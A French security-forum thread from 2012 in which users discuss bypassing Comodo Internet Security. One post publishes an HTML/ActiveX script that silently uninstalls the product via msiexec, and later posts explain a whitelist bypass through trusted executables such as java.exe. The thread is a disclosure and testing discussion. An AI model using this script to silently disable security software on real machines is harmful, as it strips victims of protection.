Comodo Internet Security 5.xx vs Script
#151
Posté 03 décembre 2012 - 07:06
"Il ne faut pas compter sur ceux qui créent les problèmes pour les résoudre". Albert Einstein
"La nature ne fait rien en vain, et le plus est vain quand le moins suffit". Isaac Newton
#152
Posté 03 décembre 2012 - 12:35
Voui, Defense Wall que j'ai testé est vraiment un HIPS très puissant, mais pas de 64 bits à l'horizon
Sinon OSSS ( hXXp://www.online-solutions.ru/en/products/osss-security-suite.html ) est aussi pas mal du tout mais le nombre de pop est... digne de comodo 3 ...
Realtime: AVAST V8+COMODO FW 5.12 (sans D+/autosandbox), DynDNS Internet guide, WOT + Opera: Phishtank, AVG linkscanner, VT opera plugin, ghosthery, MS EMET
On demand: Hitman Pro, MBAM, Emsisoft Free Emergency Kit, VT uploader, VPN+DNS filter du VPN (malwares etc), secunia PSI
#153
Posté 03 décembre 2012 - 12:53
A propos de defensewall Ilyia planche sur une version 64 bits mais je n'ai pas plus d'infos. En tout cas il cherchait comment contourner le patchguard et ne sortir une version 64 bits que si elle offre le même niveau de protection que la version 32 bits. Du sérieux en somme.
"Il ne faut pas compter sur ceux qui créent les problèmes pour les résoudre". Albert Einstein
"La nature ne fait rien en vain, et le plus est vain quand le moins suffit". Isaac Newton
#154
Posté 03 décembre 2012 - 14:13
Aller, comme j'en ai marre de ce que je lis ici et là, je dévoile le script, j'en ai d'autre de toute façon.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<script language="JavaScript" type="text/javascript">
function run()
{
var wshShell = new ActiveXObject("WScript.Shell");
wshShell.Run("C:\\WINDOWS\\system32\\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart", 1, true);
}
</script>
</head>
<input type="button" value="Lancer" onclick="run()">
</body>
</html>
Cette section {E62381A7-B1C1-4121-8262-84D38C77786C} doit correspondre à votre version, vous le verrez dans le lien de désinstallation de CIS en l'éditant.
Je pense que les plus connaisseurs rigoleront bien de ce truc, moi même je trouve ça lamentable à la base. Au pire j’essaierai de faire mieux la prochaine fois.
C'est déjà publié chez comodo est d'autre, bon je sais qu'ils vont corriger ça très vite sans avoir compris le point derrière comme il y a deux ans, mais bon, on ne pourra pas dire que j'y ai mis de la mauvaise volonté.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Bonjour Shaoran, Bonjour à tous,
Merci pour le Script, j'ai donc effectué un test avec firefox et noscript et celui si le bloque bien, on peut toujours cliquer sur le bouton lancer le script ne s'execute pas.
Avec IE nous avons aussi un message d'alerte et cela fait la même chose, tu ne peux pas le lancer.
Edit : Pour avoir ce message le contenu actif doit être décoché ( paramétrage de IE par défaut )
Et enfin si nous passons en mode Paranoia et tu lances le script, Comodo affiche une alerte ( Si tu lances IE normalement pas d'alerte )
Edit : Lorsque j'ai lancé le script avec le mode parano, cette alerte est apparue et à bloqué le script, par contre pourquoi une clé de registre Winword.exe ???
Edit 2 : Au final ce sont 3 alertes qui bloquent temporaiement l'execution du script. En effet une fois bloqué le bouton apparaît quand même !!!
Edit 3 : Les 3 alertes doivent d'être liées à l'éditeur HTML de IE
J'espère que cela va rassurer les utilisateurs de Comodo d'une certaine manière.
Cordialement
Cochontetram
Ce message a été modifié par cochontetram - 04 décembre 2012 - 22:09 .
#155
Posté 03 décembre 2012 - 18:23
Le script n'est pas compatible avec firefox, seulement avec IE, c'est donc normal s'il ne se passe rien. Quand au mode paranoïa, ouais en effet, car la liste blanche n'est plus utilisée comme déjà dit. Mais vu le nombre de pop up ...
#156
Posté 03 décembre 2012 - 18:54
Merci pour ta réponse Shaoran
Effectivement le Script n'est pas compatible avec firefox ( désolé ), mais ce qui est intéréssant c'est le blocage effectué par No-Script, de plus on voit aussi un message d'alerte pour empêcher l'execution du script sous IE.
Pour le mode Paranoïa, il a au moins le mérite d'être là et de faire son taf même s'il génère beaucoup de pop_up
J'espère que cela va de nouveau rassurer les utilisateurs de Comodo
++ Cochontetram
Ce message a été modifié par cochontetram - 03 décembre 2012 - 19:05 .
#157
Posté 04 décembre 2012 - 18:01
Bonjour à tous, bonjour Shaoran, Vigen
PC Personnel : Windows Seven Entreprise X64, IE 9, CIS 5 et système à jour.
Je rebondis sur mon dernier post pour faire un petit récapitulatif.
1- Le Script n'est pas compatible avec les autres navigateurs, mais ce qui peut être retenu c'est le blocage effectué par No-Script pour Firefox,
2- Avec IE nous avons deux messages lorsque nous lançons le script, le premier message (en bas) :
Edit : Pour avoir ce message le contenu actif doit être décoché ( paramétrage de IE par défaut )
Le deuxième message d’alerte d'IE :
3- Du côté de Comodo, passons en mode Panoraïa et lançons le script. CIS affiche une alerte (Si nous lançons IE normalement pas d’alerte) :
Edit : Lorsque j'ai lancé le script avec le mode parano, cette alerte est apparue et à bloqué le script, par contre pourquoi une clé de registre Winword.exe ???
Edit 2 : Au final ce sont 3 alertes qui bloquent temporairement l'execution du script. En effet une fois bloqué le bouton apparaît quand même !!!
Edit 3 : Les 3 alertes doivent d'être liées à l'éditeur HTML de IE
Mais le plus intéressant et cette alerte de Comodo, si vous avez autorisé les deux alertes d'IE. En effet CIS affiche une alerte qui indique qu’IE veut lancer notre ami msiexec.exe :
J’espère que ce petit récapitulatif va définitivement rassurer les utilisateurs de Comodo, car su mon PC personnel CIS est toujours en vie.
PS : Je sais qu’aucune solution de sécurité n’est fiable à 100% et que chacune d’entre elle possède leurs lots de problèmes, bugs, exploits, mais il existe aussi des moyens simples pour se rassurer et s’en protéger.
D’ailleurs il est important que des utilisateurs continuent à mettre en avant les problèmes, les bugs, et les exploits de nos tendres solutions de sécurité
++
Cochontetram
Ce message a été modifié par cochontetram - 05 décembre 2012 - 19:19 .
#158
Posté 04 décembre 2012 - 21:24
Super !
Nous voici en grande partie rassurés !
@+
"They who can give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety."(Benjamin Franklin)
#159
Posté 05 décembre 2012 - 07:22
Le débat s'est déporté sur wilders security où certains membres semblent s'inquiéter du problème contrairement au forum de comodo... (Dont on ne doute pas que la prochaine release bloquera ça)
"Il ne faut pas compter sur ceux qui créent les problèmes pour les résoudre". Albert Einstein
"La nature ne fait rien en vain, et le plus est vain quand le moins suffit". Isaac Newton
#160
Posté 05 décembre 2012 - 08:22
Pas de panique, ce genre de faille n'était jusqu'à présent pas exploitée
Bon d'accord, il ne faut pas douter que dans un future proche elle le sera certainement, et devant la super réactivité des labos Comodo , il vous reste toujours l'option énoncée par Cochontetram ...
[mode connerie]Peut-être leur suggérer d'inclure No-Script dans leur installateur [/mode connerie]
"Celui qui aime à apprendre est bien près du savoir" (Confucius)
________________________________________________
#161
Posté 05 décembre 2012 - 11:01
Aller, comme j'en ai marre de ce que je lis ici et là, je dévoile le script, j'en ai d'autre de toute façon.
.../...
.../...
wshShell.Run("C:\\WINDOWS\\system32\\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart", 1, true);Je pense que les plus connaisseurs rigoleront bien de ce truc, moi même je trouve ça lamentable à la base. Au pire j’essaierai de faire mieux la prochaine fois.
Sapristi ! Alors là quand même...
Je m'attendais à quelque chose d'un peu plus velu !
En fait, on se débarasse de Comodo (oui oui, et d'autres) comme je le fais (en plus rustique) dans mes installs silencieuses pour virer par exemple une toolbar Ask qui s'incruste avec un freeware !
Bien vu Shaoran
Bien que je sois d'accord avec ce qui a déjà été dit, qu'aucune solution n'est infaillible, et qu'il ne sert à rien de se fier aux tests faits par Y je jour X, car le ledemain les résultats pourrons très bien être à l'exact opposé, ça conforte tout à fait ce que je pense de Comodo, en gros depuis "l'affaire shaoran".
A savoir que ces gens ne sont pas crédibles. Il y a probablement dans l'équipe des codeurs de talent et des bonnes volontés, et les interfaces récentes sont assez plaisantes à mon goût. Mais avec un gourou de secte à la tête, et un comportement bordélique à de nombreux niveaux, sans parler de leurs pratiques douteuses consistant à détourner les résultats de produits concurents à leur avantage en voulant jouer sur les mots et les lois... ça fait maigre.
A mon goût il est clair que crédibilité en terme de professionalisme pour des gens censés oeuvrer dans la sécurité informatique = ZERO.
Et peu m' importe que Pierre Paul ou Jacques ne fassent pas mieux ou pire.
Ce n'est que mon avis, svp pas de fight inutile ici.
Et merci à ceux qui savent faire avancer les choses, avec modestie et simplicité
#162
Posté 05 décembre 2012 - 13:28
#163
Posté 05 décembre 2012 - 17:45
Concernant les autres applications par lesquelles ça pourrait passer je ne vois pas comment faire.
"Il ne faut pas compter sur ceux qui créent les problèmes pour les résoudre". Albert Einstein
"La nature ne fait rien en vain, et le plus est vain quand le moins suffit". Isaac Newton
#164
Posté 06 décembre 2012 - 18:51
"Osss est infernal en effet mais c'est un sacré outil de sécurité.
A propos de defensewall Ilyia planche sur une version 64 bits mais je n'ai pas plus d'infos. En tout cas il cherchait comment contourner le patchguard et ne sortir une version 64 bits que si elle offre le même niveau de protection que la version 32 bits. Du sérieux en somme."
Voui, c'est du solide OSSS et DW. Contourner patchguard ? Bin lol, faudrait demander aux auteurs de malware qui le font En tout cas ca demande du taf aux dev de la faire proprement car même Emsisoft n'a pas sortie sa version d'OA qui devrait soit disant être "full 64 bits" selon Fabian Worsar.
Au fait, patchguard était plus costaud sur W7 que sur Vista et sur W8, qu'en est-il? Ils ont seulement rajouté secure boot ou bien?
Ce message a été modifié par tma86 - 06 décembre 2012 - 18:52 .
Realtime: AVAST V8+COMODO FW 5.12 (sans D+/autosandbox), DynDNS Internet guide, WOT + Opera: Phishtank, AVG linkscanner, VT opera plugin, ghosthery, MS EMET
On demand: Hitman Pro, MBAM, Emsisoft Free Emergency Kit, VT uploader, VPN+DNS filter du VPN (malwares etc), secunia PSI
#165
Posté 06 décembre 2012 - 20:19
Il faudrait par contre peut être comprendre que IE est une voie d’accès, qu'activeX en fait parti, mais que tout le système complet est une voie d'accès.
Autrement dit, s'il existe une faille de sécurité comme un dépassement de mémoire tampon sous VLC qui serait enclencher par une vidéo. Cette vidéo serait un trou utilisable par cette faille.
Même chose pour un tableau excel ou odt.
Même chose pour un plugin que ce soit sous IE, Firefox, Chrome, WLM et j'en passe des meilleurs.
En gros, l'idée à retenir la dedans c'est que si une menace utilise un exécutable présent dans la liste blanche pour se propager, il va se confronter volontairement ou non à cette faille et la protection ne dira rien. Donc comme je le disais du temps de mon exploit java, arrêtez de parler de java (IE) et voyez le cœur du problème. Pas mes démonstrations codées à la va vite. Elle sont là pour montrer un raisonnement que j'ai eu à la sortie de la béta de CIS4, sachant que j'ai un raisonnement très scientifique en général. Rappelez vous des cours de démonstrations en mathématique, c'est super pratique dans la vie de tous les jours en faite, on est bien loin de quand on se faisait chier en cours.
C'est ici une preuve par l'exemple : http://fr.wikipedia....e_par_l'exemple
Ce que l'on sait de base :
Toute application dans la liste sûre peuvent faire tout ce qu'elle veulent.
Toute application dans les liste non sûre ne peut rien faire
Toute application inconnue est soumise aux décision de l'utilisateur ou restreint par la sandbox
Ce que l'on cherche à démontrer :
Si une application sûre exécute un code malveillant, la protection n'agira pas.
Ici la démonstration est de le prouver au moins une fois, ce qui était très pertinent avec mon premier exploit.
Le code est contenu dans un fichier jar (ie fichier exécutable java)
Si j’exécute directement le fichier jar, la sandbox réagi ou bien l'hips réagi. (commande : mon_fichier.jar)
Si je lance l’exécutable en passant par l'exécutable java, la protection ne fait rien (commande java.exe -jar mon_fichier.jar)
De fait, avec un essais cela passe, le raisonnement tient la route, de fait c'est reproductible, c'est ce que j'ai fait avec IE. C'est aussi ce que j'ai fais récemment avec firefox.
Naturellement, si on prenait le temps, on pourrait faire une excellente démonstration sans avoir de pop up à l’écran ou de problème de droits sous vista et seven. Sauf que ce genre de travail demande du temps et que je préfère utiliser le mien sur des choses plus utiles sachant pertinemment que ce soit Comodo ou emisoft, les deux ont réagit pareils aux première failles et on juste colmater l'exploit montré sans prendre en compte le vrai problème soulever et le raisonnement qu'il y a derrière.
#166
Posté 06 décembre 2012 - 20:39
"Il ne faut pas compter sur ceux qui créent les problèmes pour les résoudre". Albert Einstein
"La nature ne fait rien en vain, et le plus est vain quand le moins suffit". Isaac Newton
#167
Posté 06 décembre 2012 - 21:11
Je crois surtout du peu que je constate que defensewall ne travail pas comme les autres.
Si l'on prend CIS / OA, on part d'une liste de fichiers inconnus que l'on reparti en sûr et non sûr. Sachant que montrer qu'un fichier est réellement sûr ... comme montré, c'est plus complexe que cela ne semble.
Si l'on prend defensewall, j'ai plus l'impression qu'il part du principe que tout est sûr (ou non surveillé) et de là, il retire ceux qui peuvent être vecteurs de menaces. Auquel cas, c'est bien plus simple à gérer, et bien plus sûr comme raisonnement. A voir après les contrainte d'un tel système.
#168
Posté 06 décembre 2012 - 21:18
Le reste est trusted.
Pas de virtualisation, que des restrictions et le rollback pour revenir à un état antérieur (à consommer avec modération).
"Il ne faut pas compter sur ceux qui créent les problèmes pour les résoudre". Albert Einstein
"La nature ne fait rien en vain, et le plus est vain quand le moins suffit". Isaac Newton
#169
Posté 06 décembre 2012 - 21:34
Je ne pense pas qu'on l'on puisse dire tout ce qui est connecté à internet. Dans le cas de cmd par exemple, ce dernier ne peut pas se connecter à internet (c'est bien l'un des problème de Windows enfin corrigé par powershell d'ailleurs). Par contre, c'est l'un des principaux vecteurs d'attaques et il est bien non sûr par défaut.
#170
Posté 06 décembre 2012 - 21:44
"Il ne faut pas compter sur ceux qui créent les problèmes pour les résoudre". Albert Einstein
"La nature ne fait rien en vain, et le plus est vain quand le moins suffit". Isaac Newton
0 utilisateur(s) en train de lire ce sujet
0 membre(s), 0 invité(s), 0 utilisateur(s) anonyme(s)